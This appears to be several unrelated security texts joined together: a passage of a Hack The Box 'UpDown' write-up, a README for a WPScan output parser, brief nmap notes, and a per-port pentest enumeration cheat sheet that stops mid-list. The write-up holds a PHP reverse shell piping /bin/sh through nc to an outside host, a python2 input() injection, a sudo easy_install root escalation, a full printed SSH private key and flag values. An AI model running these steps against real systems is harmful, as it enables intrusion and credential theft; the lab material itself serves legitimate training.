:: Header : User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
:: Header : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
:: Header : Accept-Language: en-US,en;q=0.5
:: Header : Content-Type: multipart/form-data; boundary=---------------------------400346544333176877002266488658
:: Header : Connection: close
:: Data : -----------------------------400346544333176877002266488658
Content-Disposition: form-data; name="file"; filename="urlsFUZZ"
Content-Type: application/octet-stream
test
-----------------------------400346544333176877002266488658
Content-Disposition: form-data; name="check"
Check
-----------------------------400346544333176877002266488658--
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
.php [Status: 200, Size: 534, Words: 3, Lines: 2, Duration: 88ms]
.test [Status: 200, Size: 649, Words: 1, Lines: 9, Duration: 91ms]
.txt [Status: 200, Size: 649, Words: 1, Lines: 9, Duration: 102ms]
:: Progress: [3/3] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
```
We can see that the response length for allowed extensions is `649`, so we can use the flag `-ms` which matches the size to `649` and re-run the command with the list php-extentions.txt[php-extentions.txt](./php-extensions.txt):
```console
┌─[evyatar9@parrot]─[/hackthebox/UpDown]
└──╼ $ cat php-extentions.txt
.php
.php2
.php3
.php4
.php5
.php6
.php7
.phps
.phps
.pht
.phtm
.phtml
.pgif
.shtml
.htaccess
.phar
.inc
.hphp
.ctp
.module
```
And by re-running "ffuf", we obtain the following results:
```console
┌─[evyatar9@parrot]─[/hackthebox/UpDown]
└──╼ $ ffuf -request req -request-proto http -w php-extentions.txt -ms 649
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.5.0-dev
________________________________________________
:: Method : POST
:: URL : http://dev.siteisup.htb/
:: Wordlist : FUZZ: php-extentions.txt
:: Header : Referer: http://dev.siteisup.htb/
:: Header : Content-Type: multipart/form-data; boundary=---------------------------400346544333176877002266488658
:: Header : DNT: 1
:: Header : Special-Dev: only4dev
:: Header : Host: dev.siteisup.htb
:: Header : User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
:: Header : Accept-Language: en-US,en;q=0.5
:: Header : Connection: close
:: Header : Upgrade-Insecure-Requests: 1
:: Header : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
:: Header : Accept-Encoding: gzip, deflate
:: Header : Origin: http://dev.siteisup.htb
:: Data : -----------------------------400346544333176877002266488658
Content-Disposition: form-data; name="file"; filename="urlsFUZZ"
Content-Type: application/octet-stream
test
-----------------------------400346544333176877002266488658
Content-Disposition: form-data; name="check"
Check
-----------------------------400346544333176877002266488658--
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response size: 649
________________________________________________
.module [Status: 200, Size: 649, Words: 1, Lines: 9, Duration: 161ms]
.htaccess [Status: 200, Size: 649, Words: 1, Lines: 9, Duration: 174ms]
.pgif [Status: 200, Size: 649, Words: 1, Lines: 9, Duration: 239ms]
.phtm [Status: 200, Size: 649, Words: 1, Lines: 9, Duration: 247ms]
.ctp [Status: 200, Size: 649, Words: 1, Lines: 9, Duration: 251ms]
.inc [Status: 200, Size: 649, Words: 1, Lines: 9, Duration: 252ms]
.phar [Status: 200, Size: 649, Words: 1, Lines: 9, Duration: 252ms]
.pht [Status: 200, Size: 649, Words: 1, Lines: 9, Duration: 252ms]
:: Progress: [20/20] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
```
We can see that the `.phar` extension is allowed. `.phar` files are similar to `.jar` files for java, but for `php`, and can be executed like a `php` file (by running it with `php` or including it in a script).
Let's take another look at the code:
```php
...
# Check if extension is allowed.
$ext = getExtension($file);
if(preg_match("/php|php[0-9]|html|py|pl|phtml|zip|rar|gz|gzip|tar/i",$ext)){
die("Extension not allowed!");
}
# Create directory to upload our file.
$dir = "uploads/".md5(time())."/";
if(!is_dir($dir)){
mkdir($dir, 0770, true);
}
# Upload the file.
$final_path = $dir.$file;
move_uploaded_file($_FILES['file']['tmp_name'], "{$final_path}");
# Read the uploaded file.
$websites = explode("\n",file_get_contents($final_path));
foreach($websites as $site){
$site=trim($site);
if(!preg_match("#file://#i",$site) && !preg_match("#data://#i",$site) && !preg_match("#ftp://#i",$site)){
$check=isitup($site);
if($check){
echo "<center>{$site}<br><font color='green'>is up ^_^</font></center>";
}else{
echo "<center>{$site}<br><font color='red'>seems to be down :(</font></center>";
}
}else{
echo "<center><font color='red'>Hacking attempt was detected !</font></center>";
}
}
# Delete the uploaded file.
@unlink($final_path);
...
```
We can see that the file extension check can be bypassed by uploading a `.phar` file. The code then moves the file to the `uploads` directory and checks if the websites inside the file are up or down, and subsequently deletes our file.
Thus, we can upload a file containing many websites, giving us enough time to execute our web shell.
The first step is to upload the file [rev.phar](./rev.phar), which contains websites and a `PHP` reverse shell. It is important to ensure that the file size is less than 10KB:
```console
┌─[evyatar9@parrot]─[/hackthebox/UpDown]
└──╼ $ cat rev.phar
...
scp://evyatar9.com
scp://evyatar9.com
scp://evyatar9.com
scp://evyatar9.com
scp://evyatar9.com
scp://evyatar9.com
scp://evyatar9.com
scp://evyatar9.com
scp://evyatar9.com
<?php
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("file", "/tmp/error-output.txt", "a")
);
$cwd = '/tmp';
$env = array('some_option' => 'aeiou');
$process = proc_open('sh', $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
fwrite($pipes[0], 'rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 4242 >/tmp/f');
fclose($pipes[0]);
echo stream_get_contents($pipes[1]);
fclose($pipes[1]);
$return_value = proc_close($process);
echo "command returned $return_value\n";
}
?>
```
Next, select the file [rev.phar](./rev.phar) to upload on the `checker` website located at http://dev.siteisup.htb/. Interception of the request should be done using Burp, the same should be done on http://dev.siteisup.htb/upload:
![checker.JPG](images/checker.JPG)
Intercept the request and add the `Special-Dev: only4dev` header:
![intercept.JPG](images/intercept.JPG)
Repeat the same process for the `uploads` page:
![uploadintercept.JPG](images/uploadintercept.JPG)
We can see the following directory:
![uploads.JPG](images/uploads.JPG)
This directory contains our `rev.phar` file:
![rev.JPG](images/rev.JPG)
Clicking on the file will give us a reverse shell:
```console
┌─[evyatar9@parrot]─[/hackthebox/UpDown]
└──╼ $ nc -lvp 4242
listening on [any] 4242 ...
connect to [10.10.14.14] from siteisup.htb [10.10.11.177] 43808
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ hostname
updown
```
By checking which files have SUID permission, we have found the following file:
```console
-rwsr-x--- 1 developer www-data 17K Jun 22 15:45 /home/developer/dev/siteisup
```
Let's reverse the binary using `Ghidra`, by examining the `main` function, we can see:
```c
undefined8 main(void)
{
__gid_t __rgid;
__uid_t __ruid;
__rgid = getegid();
__ruid = geteuid();
setresgid(__rgid,__rgid,__rgid);
setresuid(__ruid,__ruid,__ruid);
puts("Welcome to \'siteisup.htb\' application\n");
system("/usr/bin/python /home/developer/dev/siteisup_test.py");
return 0;
}
```
The binary is running the `python` script (```$ ls -ltr /usr/bin/python
lrwxrwxrwx 1 root root 7 Apr 15 2020 /usr/bin/python -> python2
```) script ```/home/developer/dev/siteisup_test.py``` which contains:
```python
import requests
url = input("Enter URL here:")
page = requests.get(url)
if page.status_code == 200:
print "Website is up"
else:
print "Website is down"
```
The interesting part here is the `input` function in `python2`.
By reading the following article https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes, we can try to run code using the `input` function. Because `python2` `input()` function allows executing python code before the program crashes. Let's try it:
```console
$ cd /home/developer/dev/
$ ls
siteisup
siteisup_test.py
$ ./siteisup
__import__("os").system("id")
uid=1002(developer) gid=33(www-data) groups=33(www-data)
Enter URL here:Traceback (most recent call last):
File "/home/developer/dev/siteisup_test.py", line 4, in <module>
page = requests.get(url)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 75, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 61, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 515, in request
prep = self.prepare_request(req)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 453, in prepare_request
hooks=merge_hooks(request.hooks, self.hooks),
File "/usr/local/lib/python2.7/dist-packages/requests/models.py", line 318, in prepare
self.prepare_url(url, params)
File "/usr/local/lib/python2.7/dist-packages/requests/models.py", line 392, in prepare_url
raise MissingSchema(error)
requests.exceptions.MissingSchema: Invalid URL '0': No scheme supplied. Perhaps you meant http://0?
Welcome to 'siteisup.htb' application
$
```
As we can see, we can run code using ```__import__("os").system("id")```, Let's get the SSH private key of ```developer``` user by running ```__import__("os").system("cat /home/developer/.ssh/id_rsa")```:
```console
$ ./siteisup
__import__("os").system("cat /home/developer/.ssh/id_rsa")
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
Enter URL here:Traceback (most recent call last):
File "/home/developer/dev/siteisup_test.py", line 4, in <module>
page = requests.get(url)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 75, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 61, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 515, in request
prep = self.prepare_request(req)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 453, in prepare_request
hooks=merge_hooks(request.hooks, self.hooks),
File "/usr/local/lib/python2.7/dist-packages/requests/models.py", line 318, in prepare
self.prepare_url(url, params)
File "/usr/local/lib/python2.7/dist-packages/requests/models.py", line 392, in prepare_url
raise MissingSchema(error)
requests.exceptions.MissingSchema: Invalid URL '0': No scheme supplied. Perhaps you meant http://0?
Welcome to 'siteisup.htb' application
```
Let's use it:
```console
┌─[evyatar9@parrot]─[/hackthebox/UpDown]
└──╼ $ ssh -i idrsa_developer [email protected]
The authenticity of host 'siteisup.htb (10.10.11.177)' can't be established.
ECDSA key fingerprint is SHA256:npwXkHj+pLo3LaYR66HNCKEpU/vUoTG03FL41SMlIh0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'siteisup.htb,10.10.11.177' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-122-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Nov 19 19:37:18 UTC 2022
System load: 0.0
Usage of /: 49.9% of 2.84GB
Memory usage: 24%
Swap usage: 0%
Processes: 225
Users logged in: 0
IPv4 address for eth0: 10.10.11.177
IPv6 address for eth0: dead:beef::250:56ff:feb9:882b
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Aug 30 11:24:44 2022 from 10.10.14.36
developer@updown:~$ cat user.txt
e3499c902e868bf70b2b829daeaee5ac
```
And we get the user flag ```e3499c902e868bf70b2b829daeaee5ac```.
### Root
By running ```sudo -l``` we can see the following:
```console
developer@updown:~$ sudo -l
Matching Defaults entries for developer on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User developer may run the following commands on localhost:
(ALL) NOPASSWD: /usr/local/bin/easy_install
```
So we can get root using the following command [Reference](https://gtfobins.github.io/gtfobins/easy_install/):
```console
developer@updown:~$ TF=$(mktemp -d)
developer@updown:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
developer@updown:~$ sudo easy_install $TF
WARNING: The easy_install command is deprecated and will be removed in a future version.
Processing tmp.P2MqUrlft3
Writing /tmp/tmp.P2MqUrlft3/setup.cfg
Running setup.py -q bdist_egg --dist-dir /tmp/tmp.P2MqUrlft3/egg-dist-tmp-M3XAmH
# whoami
root
# cat /root/root.txt
fd6802b8d25cf8a31e37f84976eac032
#
```
And we get the root flag ```fd6802b8d25cf8a31e37f84976eac032```.
|
# WPScan Output Parser
**`wpscan_out_parse` is a Python parser for WPScan output files** (JSON and CLI).
It analyze vulnerabilities, miscellaneous alerts and warnings and other findings.
<a href="https://github.com/tristanlatr/wpscan_out_parse/actions" target="_blank"><img src="https://github.com/tristanlatr/wpscan_out_parse/workflows/test/badge.svg"></a>
<a href="https://codecov.io/gh/tristanlatr/wpscan_out_parse" target="_blank"><img src="https://codecov.io/gh/tristanlatr/wpscan_out_parse/branch/master/graph/badge.svg"></a>
<a href="https://pypi.org/project/wpscan-out-parse/" target="_blank"><img src="https://badge.fury.io/py/wpscan-out-parse.svg"></a>
### Features
- Support WPScan JSON and CLI output files
- Display results to stdout in CLI, JSON or HTML output format
- Generate a summary table of your wordpress component containing version and vulnerabilities
- Divide the results in "Alerts", "Warnings" and "Informations"
- Additionnal alerts depending of finding type (SQL dump, etc.)
- Signal result via exit code
- Ignore messages based on false positives strings
- Simple Python library usage
- Colorized output by default
Design of summary table is largely inspired by [wpscan-analyze](https://github.com/lukaspustina/wpscan-analyze) (Rust code).
### Install
```
python3 -m pip install wpscan-out-parse
```
## How to use
### As a CLI tool
Run WPScan
```bash
wpscan --url https://mysite.com --output file.json --format json --api-token YOUR_API_TOKEN
```
Run **`wpscan_out_parse`**
```bash
python3 -m wpscan_out_parse file.json
```
And process output and/or exit code.
#### Exit codes
- 5 -> ALERT: Your WordPress site is vulnerable
- 6 -> WARNING: You WordPress site is oudated or potentially vulnerable
- 4 -> ERROR: WPScan failed
- 1 -> ERROR: Parser error
- 0 -> All OK
#### Exemples
Display results in HTML format
```bash
% python3 -m wpscan_out_parse ./test/output_files/potential_vulns.json --format html > html_output.html
```
![WPWatcher Report](https://github.com/tristanlatr/wpscan_out_parse/raw/master/sample/html_output.png "HTML Output")
### As a Python library
See the [API reference](https://tristanlatr.github.io/wpscan_out_parse/wpscan_out_parse.html).
### Additionnal alerts strings
Some additionnal warnings and alerts are raised when detecting the following strings in your output file.
Alerts
```python
"SQL Dump found",
"Full Path Disclosure found",
"www.owasp.org/index.php/Full_Path_Disclosure",
"codex.wordpress.org/Resetting_Your_Password#Using_the_Emergency_Password_Reset_Script",
"www.exploit-db.com/ghdb/3981/",
"A backup directory has been found",
"github.com/wpscanteam/wpscan/issues/422",
"ThemeMakers migration file found",
"packetstormsecurity.com/files/131957",
"Search Replace DB script found",
"interconnectit.com/products/search-and-replace-for-wordpress-databases/"
```
Warnings
```python
"Upload directory has listing enabled",
"Registration is enabled",
"Debug Log found",
"codex.wordpress.org/Debugging_in_WordPress",
"Fantastico list found",
"www.acunetix.com/vulnerabilities/fantastico-fileslist/"
```
### Full help
```bash
% python3 -m wpscan_out_parse -h
usage: python3 -m wpscan_out_parse [Options] <File path>
wpscan_out_parse is a Python parser for WPScan output files (JSON and CLI).
It analyze vulnerabilities, miscellaneous alerts and warnings and other findings.
positional arguments:
<File path> WPScan output file to parse.
optional arguments:
-h, --help show this help message and exit
--format <Format> output format, choices are: "cli", "html", "json"
--summary display ony the summary of issues per component.
--inline display only one line like: "WPScan result summary:
alerts={}, warnings={}, infos={}, error={}".
--no_warnings do not display warnings, only summary and alerts.
Implies --no_infos.
--no_infos do not display informations and findinds.
--no_summary do not display the summary of issues.
--show_all show all findings details (found by, confidence,
confirmed by).
--false_positive String [String ...]
consider all matching messages as infos and add
"[False positive]" prefix.
--no_color do not colorize output.
--version print wpscan_out_parse version and exit.
```
|
# Nmap commands
#This command is used to find machines connected to my network.
```
nmap -sV -sP 10.0.0.15/24
```
I use this command to find open ports
```
nmap -sV 10.0.0.21
```
scans all ports on a network
```
nmap -sV -sP 10.0.0.15/24 -p-
```
scans SYN packages on a network
```
nmap -sS -p- 10.0.0.21
```
command used to find vulnerabilities
```
nmap -sV --script vuln 10.10.75.170
```
|
# Enumeration
## Ports
### FTP - 21
> https://book.hacktricks.xyz/pentesting/pentesting-ftp
>
> - Fingerprint: `nc -nv <ip> 21`
> - Anonymous Access: `ftp <ip>` `ftp> anonymous` `ftp> pass`
> - Browser Access: `ftp://anonymous:[email protected]`
> - Commands:
> - Binary Mode: `binary`
> - Upload File: `put <file>`
> - Upload Multiple Files: `mput <file1> <file2>`
> - Download File: `get <file>`
> - Download Multiple Files: `mget <file1> <file2>` `mget *`
> - Nmap Scripts: `nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -p 21 <ip>`
> - Config Files:
> - ftpusers
> - ftp.conf
> - proftpd.conf
### SSH - 22
> https://book.hacktricks.xyz/pentesting/pentesting-ssh
>
> - Fingerprint: `nc -nv <ip> 22`
> - Public SSH key scan: `ssh-keyscan -t rsa <IP> -p 22`
> - Known bad keys: [rapid7/ssh-badkeys](https://github.com/rapid7/ssh-badkeys/tree/master/authorized)
> - Config Files:
> - ssh_config
> - sshd_config
> - authorized_keys
> - ssh_known_hosts
> - .shosts
### Telent - 23
> https://book.hacktricks.xyz/pentesting/pentesting-telnet
>
> - Fingerprint: `telnet <ip>`
### SMTP - 25/465/587
> https://book.hacktricks.xyz/pentesting/pentesting-smtp
>
> - Fingerprint: `nc -nv <ip> 25`
> - Commands:
> - Username Exists: `VRFY <username>`
> - Username Valid: `EXPN <username>`
> - Nmap Scripts: `nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 <ip>`
> - User Bruteforce: `smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t <ip>`
> - Config Files:
> - sendmail.cf
> - submit.cf
### WHOIS - 43
> https://book.hacktricks.xyz/pentesting/43-pentesting-whois
### DNS - 53
> https://book.hacktricks.xyz/pentesting/pentesting-dns
>
> - Fingerprint: `nc -nv <ip> 53`
> - Get Records (ns, mx, txt, cname): `host -t <record> <ip>` `nslookup <ip>` `dig axfr <domain> @<ip>`
> - Add domains found to host file (/etc/host)
> - Config Files:
> - host
> - resolv.conf
### TFTP - 69 (UDP)
> https://book.hacktricks.xyz/pentesting/69-udp-tftp
>
> - Fingerprint: `nc -nv <ip> 69`
> - Commands:
> - Binary Mode: `binary`
> - Upload File: `put <file>`
> - Upload Multiple Files: `put <file1> <file2>`
> - Download File: `get <file>`
> - Download Multiple Files: `get <file1> <file2>` `get *`
> - Nmap Scripts: `nmap --script=tftp-enum.nse -p 69 <ip>`
> - Run Command: `winexe -U <username> //<ip> "cmd.exe /c <command>" --system`
### Finger - 79
> https://book.hacktricks.xyz/pentesting/pentesting-finger
>
> - Fingerprint: `nc -nv <ip> 79`
### Kerbors - 88
> Nmap Scripts: `nmap --script=krb5-enum-users --script-args="krb5-enum-users.realm='<domain>'" -p 88 <ip>`
### HTTP/HTTPS - 80/443
> https://book.hacktricks.xyz/pentesting/pentesting-web
>
> - Fingerprint: `nc -nv <ip> 80/443`
> - Directories:
> - `nikto -host http(s)://<ip>:<port> (-ssl)`
> - `dirsearch -w /path/to/wordlist -t 30 --full-url -e <extensions> -u http(s)://<ip>:<port>`
> - `ffuf -w /path/to/wordlist -e <extensions> -u <target>/FUZZ`
> - Subdomains/Vhosts:
> - Subdomains: `curl -s -H "Host: nonexistent.<target>" http://<target> | wc -c` & `ffuf -w /path/to/subdomain/wordlist -u https://<target> -H "Host: FUZZ" -fs <previous output>`
> - Vhosts: `curl -s -H "Host: nonexistent.<target>" http://<target> | wc -c` & `ffuf -w /path/to/vhost/wordlist -u https://<target> -H "Host: FUZZ.<target>" -fs <previous output>`
> - SSL:
> - Cert Info (get usernames/vhosts): `sslscan <ip>`
> - Heartbleed: `nmap --script=ssl-heartbleed -p 443 <ip>`
> - Check Input Validation (injection vectors):
> - SQL: `' or 1=1 #`
> - XSS: `<script>alert(‘XSS’)</script>`
> - Path Traversal: `http://<url>/../..`
> - Format String: `%n` `%x` `%s`
> - Command Execution: `pwd` may need to escape first (‘ & ! ¦ < >)
> - Errors: `NULL`
> - Check Page Source: hidden values, dev comments, data leakage, passwords, etc.
> - Config Files: depends on server type, use info from fingerprint to research
> - Log Files: depends on server type, use info from fingerprint to research
### Kerberos - 88
> https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88 > https://book.hacktricks.xyz/windows/active-directory-methodology/kerberos-authentication
### POP3 - 110/995
> https://book.hacktricks.xyz/pentesting/pentesting-pop
>
> - Fingerprint: `nc -nv <ip> 110`
> - Commands:
> - Login: `USER <username>` `PASS <password>`
> - List Emails: `list`
> - View Email: `retr <id>`
### rpcbind - 111
> https://book.hacktricks.xyz/pentesting/pentesting-rpcbind
>
> - Get Info:
> - `rpcinfo -p <ip>`
> - `rpcclient -U "" <ip>`
> - `srvinfo`
> - `enumdomusers`
> - `enumdomgroups`
> - `getdompwinfo`
> - `querydominfo`
> - `netshareenum`
> - `netshareenumall`
### Ident - 113
> https://book.hacktricks.xyz/pentesting/113-pentesting-ident
### NTP - 123
> https://book.hacktricks.xyz/pentesting/pentesting-ntp
### MSRPC - 135/594
> https://book.hacktricks.xyz/pentesting/135-pentesting-msrpc
>
> - Nmap Scripts: `nmap --script=msrpc-enum -p 135 <ip>`
### NetBios - 137/138/139
> https://book.hacktricks.xyz/pentesting/137-138-139-pentesting-netbios
### SMB - 139/445
> https://book.hacktricks.xyz/pentesting/pentesting-smb
> https://www.willhackforsushi.com/sec504/SMB-Access-from-Linux.pdf
> https://tldp.org/HOWTO/SMB-HOWTO-8.html
>
> - Fingerprint: `nc -nv <ip> 139/445`
> - List Shares: `smbclient -L \\\\<ip>`
> - Get Shares: `smbclient \\\\<ip>\\\\<share>` `rpcclient -U " " 10.11.1.111`
> - Null Sessions: `smbclient //<ip>/IPC$ -N` `rpcclient -U "" -N <ip>` (see **rpcbind** above for available commands)
> - Nmap Scripts:`nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 <ip>`
> - SID Lookup: Impacket - `lookupsid.py <username>:<password>@<ip>`
> - WinRM: `evil-winrm -i <ip> -u <username> -p <password>`
### SMTP - 143/993
> https://book.hacktricks.xyz/pentesting/pentesting-imap
### SNMP - 161/162/10161/10162 (UDP)
> https://book.hacktricks.xyz/pentesting/pentesting-snmp
>
> - Get Info: `snmp-check <ip> -c <public|private|community>`
> - Nmap Scripts: `nmap --script=snmp-netstat,snmp-processes -p 161,162 <ip>`
### IRC - 194/6660-7000
> https://book.hacktricks.xyz/pentesting/pentesting-irc
### CheckPoint Firewall-1 - 264
> https://book.hacktricks.xyz/pentesting/pentesting-264-check-point-firewall-1
### LDAP - 389/636/3268/3269
> https://book.hacktricks.xyz/pentesting/pentesting-ldap
>
> - `ldapsearch -h <ip> -p 389 -x -b "dc=<domain>,dc=<tld>"`
> - `ldapsearch -x -h <ip> -D '<DOMAIN>\<username>' -w '<password-hash>'`
> - `ldapdomaindump <ip> -u '<DOMAIN>\<username>' -p '<password-hash>'`
### IPsec/IKE VPN - 500 (UDP)
> https://book.hacktricks.xyz/pentesting/ipsec-ike-vpn-pentesting
### Modbus - 502
> https://book.hacktricks.xyz/pentesting/pentesting-modbus
### Rexec - 512
> https://book.hacktricks.xyz/pentesting/512-pentesting-rexec
### Rlogin - 513
> https://book.hacktricks.xyz/pentesting/pentesting-rlogin
### Rsh - 514
> https://book.hacktricks.xyz/pentesting/pentesting-rsh
### LPD - 515
> https://book.hacktricks.xyz/pentesting/515-pentesting-line-printer-daemon-lpd
### RTSP - 554/8554
> https://book.hacktricks.xyz/pentesting/554-8554-pentesting-rtsp
### Rsync - 873
> https://book.hacktricks.xyz/pentesting/873-pentesting-rsync
### Rusersd - 1026
> https://book.hacktricks.xyz/pentesting/1026-pentesting-rusersd
### Java RMI - 1089/1099
> https://book.hacktricks.xyz/pentesting/1099-pentesting-java-rmi
### MSSQL - 1433
> https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
>
